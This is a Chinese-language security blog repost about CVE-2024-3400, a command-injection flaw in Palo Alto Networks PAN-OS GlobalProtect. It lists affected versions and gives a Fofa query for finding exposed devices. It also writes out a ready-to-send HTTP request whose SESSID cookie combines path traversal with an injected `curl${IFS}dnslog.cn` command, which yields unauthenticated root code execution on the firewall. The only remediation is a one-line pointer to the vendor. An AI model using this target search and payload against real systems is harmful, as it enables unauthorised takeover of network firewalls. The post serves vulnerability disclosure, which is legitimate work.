(CVE-2024-3400)Palo Alto Networks PAN-OS 命令执行漏洞

admin 2024年4月25日18:57:11评论20 views字数 771阅读2分34秒阅读模式
0x01 前言

针对特定 PAN-OS 版本和不同功能配置的 Palo Alto Networks PAN-OS 软件的 GlobalProtect 功能中的任意文件创建漏洞导致的命令注入可能使未经身份验证的攻击者能够在防火墙上以根权限执行任意代码。Cloud NGFW、Panorama 设备和 Prisma Access 不受此漏洞的影响。
0x02 影响平台

version < 11.0.4-h1version < 10.2.9-h1version < 10.2.8-h3version < 10.2.7-h8version < 10.2.6-h3version < 11.1.0-h3version < 11.1.2-h3version < 11.0.2-h4version < 11.0.3-h10
0x03 漏洞复现

Fofa: app="PaloAlto-GlobalProtect"

构造payload,发送数据包

POST /ssl-vpn/hipreport.esp HTTP/1.1Host: Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}dnslog.cn`;Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0

查看dnslog记录

(CVE-2024-3400)Palo Alto Networks PAN-OS 命令执行漏洞

0x04 修复建议

关注厂商更新产品:https://www.paloaltonetworks.com/
0x04 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2024-3400

原文始发于微信公众号(SheYin):(CVE-2024-3400)Palo Alto Networks PAN-OS 命令执行漏洞(附edusrc邀请码)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月25日18:57:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2024-3400)Palo Alto Networks PAN-OS 命令执行漏洞http://cn-sec.com/archives/2686163.html

发表评论

匿名网友 填写信息